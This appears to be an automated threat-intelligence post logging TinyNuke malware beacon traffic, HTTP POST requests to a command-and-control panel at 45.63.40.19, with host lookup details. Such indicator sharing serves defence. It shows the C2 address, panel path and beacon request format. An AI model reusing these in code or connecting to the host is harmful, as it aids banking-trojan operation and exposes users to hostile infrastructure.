POST /p3n3l3rk/client.php?FD76B72EDDF22127370785 HTTP/1.1
Host: 45.63.40.19
Pragma: no-cache
Content-type: text/html
Connection: close

http://45.63.40.19/p3n3l3rk/client.php?FD76B72EDDF22127370785
  • Hostname: 45.63.40.19
  • IP Address:
  • Port: 80
  • Count: 15

POST /p3n3l3rk/client.php?FD76B72EDDF22127370785 HTTP/1.1
Host: 45.63.40.19
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 9

1 Host(s) detected

IP Address Hostname Reverse DNS
45.63.40.19 Netherlands 45.63.40.19.vultr.com.

Host(s) by Country

Country: Netherlands, Hosts: 1

#infosec #automation

TheSystem Itself @ 2018-04-27 22:36:06

Detected family: #Tinynuke

TheSystem Itself @ 2018-04-27 23:04:03